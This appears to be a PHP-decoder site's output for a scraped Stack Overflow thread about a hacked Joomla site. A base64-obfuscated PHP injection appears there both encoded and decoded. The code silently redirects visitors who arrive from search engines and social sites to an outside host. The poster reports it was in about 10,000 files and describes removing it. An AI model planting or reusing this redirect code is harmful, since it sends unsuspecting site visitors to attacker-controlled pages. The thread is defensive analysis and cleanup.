Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKC..

Decoded Output download

<?  eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGluaWEuenlucy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ==")); 
This is base64 encoded code now here is the actual code of PHP which is going to run, after Decoding this string: 
 
error_reporting(0); 
$qazplm=headers_sent(); 
if (!$qazplm){ 
$referer=$_SERVER['HTTP_REFERER']; 
$uag=$_SERVER['HTTP_USER_AGENT']; 
if ($uag) { 
if (!stristr($uag,"MSIE 7.0")){ 
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { 
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ 
header("Location: http://hinia.zyns.com/"); 
exit(); 
} 
} 
} 
} 
} 
As you can see in the code this will only target searching engines, so now clear that's the threat. 
 
Now any guess how much time this is repeated, through my website??? 
 
you would not believe, its about 10,000 times repeated, I got it every where whether it is Modules, Plugins, Admin, Library etc, in sort every single file. 
 
So to make my website work again I had to remove every single line, I did the same, as a result of it you may check website running well again. 
 
I will really appreciate, if some one share, how this injection works? 
 
share|improve this answer 
answered Jun 22 '12 at 19:46 
 
Ishan Dhingra 
3511316 
 
up vote 
2 
down vote 
Try to disable plugins, here is a tutorial: http://www.ostraining.com/blog/joomla/disable-a-joomla-plugin/ if it will works, you will be able to identify which plugin is infected. 
 
share|improve this answer 
answered Jun 22 '12 at 12:24 
 
Mantas Vaitk?nas 
260210 
That's a good Idea but, what if every single file is infected, I got that situation, I am Posting my answer, how I get ride of it, with you valuable Response!!!  Ishan Dhingra Jun 22 '12 at 19:35 
Your Answer 
 
  
log in	or 
Name 
 
Email 
 
Home Page 
 
 
By posting your answer, you agree to the privacy policy and terms of service. 
 
Not the answer you're looking for? Browse other questions tagged redirect joomla1.5 hacking google-search virus or ask your own question. 
tagged 
redirect  10105 
joomla1.5  1062 
hacking  610 
google-search  237 
virus  184 
asked 
8 months ago 
viewed 
2389 times 
active 
2 months ago 
Community Bulletin 
event2013 Community Moderator Election  ends in 5 days 
blogPodcast #44  This Should Have Been #43 
 
iOS Developer 
Yakimbi 
Kuala Lumpur, Malaysia / 
Software Engineer 
ChoiceStream 
Boston, MA 
Full Stack Ruby on Rails Developer 
StorkUp 
Glasgow, United Kingdom 
Linked 
Wordpress blog redirect to another URL from google search engine result 
Related 
Search Engine Friendly method for webpage redirection - how safe is 301 Redirect? 
Google Custom Search - Have it only index certain pages of a site 
Google groups not finding discussion thread but regular google search does? 
Updating the Google search results text 
How to get google search results in my application? 
Determine if a Google URL is a quick search 
how can I use google search engine to Search my source code for Copy pasted cod  ?>

Did this file decode correctly?

Original Code

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGluaWEuenlucy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));
This is base64 encoded code now here is the actual code of PHP which is going to run, after Decoding this string:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://hinia.zyns.com/");
exit();
}
}
}
}
}
As you can see in the code this will only target searching engines, so now clear that's the threat.

Now any guess how much time this is repeated, through my website???

you would not believe, its about 10,000 times repeated, I got it every where whether it is Modules, Plugins, Admin, Library etc, in sort every single file.

So to make my website work again I had to remove every single line, I did the same, as a result of it you may check website running well again.

I will really appreciate, if some one share, how this injection works?

share|improve this answer
answered Jun 22 '12 at 19:46

Ishan Dhingra
3511316

up vote
2
down vote
Try to disable plugins, here is a tutorial: http://www.ostraining.com/blog/joomla/disable-a-joomla-plugin/ if it will works, you will be able to identify which plugin is infected.

share|improve this answer
answered Jun 22 '12 at 12:24

Mantas Vaitk?nas
260210
That's a good Idea but, what if every single file is infected, I got that situation, I am Posting my answer, how I get ride of it, with you valuable Response!!!  Ishan Dhingra Jun 22 '12 at 19:35
Your Answer

 
log in	or
Name

Email

Home Page


By posting your answer, you agree to the privacy policy and terms of service.

Not the answer you're looking for? Browse other questions tagged redirect joomla1.5 hacking google-search virus or ask your own question.
tagged
redirect  10105
joomla1.5  1062
hacking  610
google-search  237
virus  184
asked
8 months ago
viewed
2389 times
active
2 months ago
Community Bulletin
event2013 Community Moderator Election  ends in 5 days
blogPodcast #44  This Should Have Been #43

iOS Developer
Yakimbi
Kuala Lumpur, Malaysia /
Software Engineer
ChoiceStream
Boston, MA
Full Stack Ruby on Rails Developer
StorkUp
Glasgow, United Kingdom
Linked
Wordpress blog redirect to another URL from google search engine result
Related
Search Engine Friendly method for webpage redirection - how safe is 301 Redirect?
Google Custom Search - Have it only index certain pages of a site
Google groups not finding discussion thread but regular google search does?
Updating the Google search results text
How to get google search results in my application?
Determine if a Google URL is a quick search
how can I use google search engine to Search my source code for Copy pasted cod 

Function Calls

None

Variables

None

Stats

MD5 c2b152c77bb0916d0b79e1d2cc0384b7
Eval Count 0
Decode Time 92 ms